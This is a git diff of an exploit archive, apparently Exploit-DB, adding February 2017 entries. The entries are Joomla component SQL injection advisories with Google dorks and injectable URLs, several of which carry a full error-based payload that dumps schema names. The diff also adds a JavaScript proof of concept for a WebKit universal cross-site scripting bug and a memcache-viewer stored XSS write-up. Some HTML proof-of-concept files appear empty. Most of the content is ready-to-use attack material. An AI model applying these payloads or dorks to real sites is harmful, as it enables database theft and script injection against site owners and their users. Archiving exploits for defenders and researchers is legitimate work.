diff --git a/files.csv b/files.csv index d2d7b5a4c..0dd7fd79a 100644 --- a/files.csv +++ b/files.csv @@ -5382,6 +5382,7 @@ id,file,description,date,author,platform,type,port 41425,platforms/windows/dos/41425.txt,"EasyCom For PHP 4.0.0 - Buffer Overflow (PoC)",2017-02-22,hyp3rlinx,windows,dos,0 41426,platforms/windows/dos/41426.txt,"EasyCom For PHP 4.0.0 - Denial of Service",2017-02-22,hyp3rlinx,windows,dos,0 41434,platforms/multiple/dos/41434.html,"Google Chrome - 'layout' Out-of-Bounds Read",2017-02-22,"Google Security Research",multiple,dos,0 +41454,platforms/windows/dos/41454.html,"Microsoft Edge and Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion",2017-02-24,"Google Security Research",windows,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -37360,3 +37361,14 @@ id,file,description,date,author,platform,type,port 41440,platforms/php/webapps/41440.txt,"Joomla! Component Store for K2 3.8.2 - SQL Injection",2017-02-23,"Ihsan Sencan",php,webapps,0 41441,platforms/php/webapps/41441.txt,"Joomla! Component UserExtranet 1.3.1 - SQL Injection",2017-02-23,"Ihsan Sencan",php,webapps,0 41442,platforms/php/webapps/41442.txt,"Joomla! Component MultiTier 3.1 - SQL Injection",2017-02-23,"Ihsan Sencan",php,webapps,0 +41444,platforms/php/webapps/41444.txt,"Joomla! Component JooDatabase 3.1.0 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps,0 +41445,platforms/php/webapps/41445.txt,"Joomla! Component JO Facebook Gallery 4.5 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps,0 +41446,platforms/php/webapps/41446.txt,"Joomla! Component AJAX Search for K2 2.2 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps,0 +41447,platforms/php/webapps/41447.txt,"Joomla! Component Community Surveys 4.3 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps,0 +41448,platforms/php/webapps/41448.txt,"Joomla! Component Community Polls 4.5.0 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps,0 +41449,platforms/macos/webapps/41449.html,"Apple WebKit 10.0.2 - 'FrameLoader::clear' Universal Cross-Site Scripting",2017-02-24,"Google Security Research",macos,webapps,0 +41450,platforms/php/webapps/41450.txt,"Joomla! Component GPS Tools 4.0.1 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps,0 +41451,platforms/multiple/webapps/41451.html,"Apple WebKit 10.0.2 - Cross-Origin or Sandboxed IFRAME Pop-up Blocker Bypass",2017-02-24,"Google Security Research",multiple,webapps,0 +41452,platforms/php/webapps/41452.txt,"Joomla! Component Community Quiz 4.3.5 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps,0 +41453,platforms/multiple/webapps/41453.html,"Apple WebKit 10.0.2 - 'Frame::setDocument' Universal Cross-Site Scripting",2017-02-24,"Google Security Research",multiple,webapps,0 +41455,platforms/php/webapps/41455.txt,"memcache-viewer - Cross-Site Scripting",2017-02-24,HaHwul,php,webapps,0 diff --git a/platforms/macos/webapps/41449.html b/platforms/macos/webapps/41449.html new file mode 100755 index 000000000..f4c954344 --- /dev/null +++ b/platforms/macos/webapps/41449.html @@ -0,0 +1,111 @@ + + + + + \ No newline at end of file diff --git a/platforms/multiple/webapps/41451.html b/platforms/multiple/webapps/41451.html new file mode 100755 index 000000000..03e54b9ad --- /dev/null +++ b/platforms/multiple/webapps/41451.html @@ -0,0 +1,137 @@ + + + + + + + + + \ No newline at end of file diff --git a/platforms/multiple/webapps/41453.html b/platforms/multiple/webapps/41453.html new file mode 100755 index 000000000..799053fc8 --- /dev/null +++ b/platforms/multiple/webapps/41453.html @@ -0,0 +1,55 @@ + + +"use strict"; + +let f = document.documentElement.appendChild(document.createElement("iframe")); +let a = f.contentDocument.documentElement.appendChild(document.createElement("iframe")); + +a.contentWindow.onunload = () => { + f.src = "javascript:''"; + + let b = f.contentDocument.appendChild(document.createElement("iframe")); + b.contentWindow.onunload = () => { + f.src = "javascript:''"; + + let doc = f.contentDocument; + + f.onload = () => { + f.onload = () => { + f.onload = null; + + let s = doc.createElement("form"); + s.action = "javascript:alert(location)"; + s.submit(); + }; + + f.src = "https://abc.xyz/"; + }; + + }; +}; + +f.src = "javascript:''"; + + \ No newline at end of file diff --git a/platforms/php/webapps/41438.txt b/platforms/php/webapps/41438.txt index 45a8f5b2b..bab2a5f9a 100755 --- a/platforms/php/webapps/41438.txt +++ b/platforms/php/webapps/41438.txt @@ -1,7 +1,7 @@ # Exploit Title: Multiple SQL injection vulnerabilities in Mail Masta (aka mail-masta) plugin 1.0 for Wordpress. # Date: 02/18/2017 # Exploit Author: Hanley Shun -# Vendor Homepage: https://github.com/hamkovic/ +# Vendor Homepage: https://wpcore.com/plugin/mail-masta # Software Link: https://www.exploit-db.com/apps/78745b48b15bf2b81153556ef1c8ec48-mail-masta.zip # Version: 1.0 # Tested on: Kali Linux x64, Ubuntu 14.04 x64 diff --git a/platforms/php/webapps/41444.txt b/platforms/php/webapps/41444.txt new file mode 100755 index 000000000..ce285c388 --- /dev/null +++ b/platforms/php/webapps/41444.txt @@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: Joomla! Component JooDatabase v3.1.0 - SQL Injection +# Google Dork: inurl:index.php?option=com_joodb +# Date: 24.02.2017 +# Vendor Homepage: https://feenders.de/ +# Software Buy: https://extensions.joomla.org/extensions/extension/core-enhancements/coding-a-scripts-integration/joodatabase/ +# Demo: https://joodb.feenders.de/db-example.html +# Version: 3.1.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_joodb&view=catalog&format=html&reset=false&Itemid=321&task=&search=[SQL]&searchfield=Ihsan_Sencan +# http://localhost/[PATH]/index.php?option=com_joodb&view=catalog&format=html&reset=false&Itemid=321&task=&search=Ihsan_Sencan&searchfield=[SQL] +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41445.txt b/platforms/php/webapps/41445.txt new file mode 100755 index 000000000..d27beaa6f --- /dev/null +++ b/platforms/php/webapps/41445.txt @@ -0,0 +1,19 @@ +# # # # # +# Exploit Title: Joomla! Component JO Facebook Gallery v4.5 - SQL Injection +# Google Dork: inurl:index.php?option=com_jofacebookgallery +# Date: 24.02.2017 +# Vendor Homepage: http://joomcore.com/joomla32/ +# Software Buy: https://extensions.joomla.org/extensions/extension/social-web/social-media/jo-facebook-gallery/ +# Demo: http://demo.joomcore.com/joomla32/ +# Version: 4.5 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=category&id=[SQL] +# http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=albums&id=[SQL] +# http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=photo&id=[SQL] +# # # # # diff --git a/platforms/php/webapps/41446.txt b/platforms/php/webapps/41446.txt new file mode 100755 index 000000000..4f2550c62 --- /dev/null +++ b/platforms/php/webapps/41446.txt @@ -0,0 +1,19 @@ +# # # # # +# Exploit Title: Joomla! Component AJAX Search for K2 v2.2 - SQL Injection +# Google Dork: inurl:index.php?option=com_k2ajaxsearch +# Date: 24.02.2017 +# Vendor Homepage: http://taleia.software/ +# Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/k2-extensions/ajax-search-for-k2/ +# Demo: http://k2ajaxsearch.taleia.software/demo/ +# Version: 2.2 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&=[SQL] +# http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&module_id=101&efields[][]=[SQL] +# http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&module_id=[SQL]&efields[][]=Ihsan_Sencan +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41447.txt b/platforms/php/webapps/41447.txt new file mode 100755 index 000000000..8d16b9633 --- /dev/null +++ b/platforms/php/webapps/41447.txt @@ -0,0 +1,19 @@ +# # # # # +# Exploit Title: Joomla! Component Community Surveys v4.3 - SQL Injection +# Google Dork: inurl:index.php?option=com_communitysurveys +# Date: 24.02.2017 +# Vendor Homepage: http://corejoomla.com/ +# Software Buy: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/surveys/community-surveys/ +# Demo: http://demo.corejoomla.com/surveys.html +# Version: 4.3 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# index.php?option=com_communitysurveys&view=search +# http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=[SQL] +# 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1 +# # # # # diff --git a/platforms/php/webapps/41448.txt b/platforms/php/webapps/41448.txt new file mode 100755 index 000000000..8d9507eae --- /dev/null +++ b/platforms/php/webapps/41448.txt @@ -0,0 +1,19 @@ +# # # # # +# Exploit Title: Joomla! Component Community Polls v4.5.0 - SQL Injection +# Google Dork: inurl:index.php?option=com_communitypolls +# Date: 24.02.2017 +# Vendor Homepage: http://corejoomla.com/ +# Software Buy: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/polls/community-polls/ +# Demo: http://demo.corejoomla.com/polls.html +# Version: 4.5.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# index.php?option=com_communitypolls&view=search +# http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=[SQL] +# 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1 +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41450.txt b/platforms/php/webapps/41450.txt new file mode 100755 index 000000000..3c3e5735c --- /dev/null +++ b/platforms/php/webapps/41450.txt @@ -0,0 +1,19 @@ +# # # # # +# Exploit Title: Joomla! Component GPS Tools v4.0.1 - SQL Injection +# Google Dork: inurl:index.php?option=com_gpstools +# Date: 24.02.2017 +# Vendor Homepage: http://corejoomla.com/ +# Software Buy: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/gps-tools/ +# Demo: http://demo.corejoomla.com/tracks.html +# Version: 4.0.1 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# index.php?option=com_gpstools&view=search +# http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=[SQL] +# 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1 +# # # # # diff --git a/platforms/php/webapps/41452.txt b/platforms/php/webapps/41452.txt new file mode 100755 index 000000000..1c40bd9f0 --- /dev/null +++ b/platforms/php/webapps/41452.txt @@ -0,0 +1,19 @@ +# # # # # +# Exploit Title: Joomla! Component Community Quiz v4.3.5 - SQL Injection +# Google Dork: inurl:index.php?option=com_communityquiz +# Date: 24.02.2017 +# Vendor Homepage: http://corejoomla.com/ +# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/community-quiz/ +# Demo: http://demo.corejoomla.com/quiz.html +# Version: 4.3.5 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# index.php?option=com_communityquiz&view=search +# http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=title&filter_all_keywords=1&filter_order=a.created&filter_order_Dir=asc&catid[]=[SQL]&view=quizzes +# 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1 +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41455.txt b/platforms/php/webapps/41455.txt new file mode 100755 index 000000000..729cf27e7 --- /dev/null +++ b/platforms/php/webapps/41455.txt @@ -0,0 +1,30 @@ +# Exploit Title: memcache-viewer - Stored XSS +# Date: 2017-02-24 +# Exploit Author: HaHwul +# Exploit Author Blog: www.hahwul.com +# Vendor Homepage: https://github.com/chrisjameskirkham/memcache-viewer +# Software Link: https://github.com/chrisjameskirkham/memcache-viewer/archive/master.zip +# Version: Latest commit +# Tested on: Debian [wheezy] + +### Vulnerability +This program does not filter filtering on the special character when expressing the data from memcached on the web. +When XSS attacks and HTML code are inserted in the memcached, user who accesses the page will run the XSS code. + +### Example Attack code +1. Send Payload(XSS Code) after Connecting to memcached server. +#> telnet 127.0.0.1 11211 +Trying 127.0.0.1... +Connected to 127.0.0.1. +Escape character is '^]'. + +add hacked 0 900 2 +45 +STORED + +2. Insert data through memcached related 3rd party application. + +### Result +Access index.php after memcache-viewer login +DOM Area in index.php +hacked22 diff --git a/platforms/windows/dos/41454.html b/platforms/windows/dos/41454.html new file mode 100755 index 000000000..6a0df7161 --- /dev/null +++ b/platforms/windows/dos/41454.html @@ -0,0 +1,108 @@ + + + + + + + + + + + + \ No newline at end of file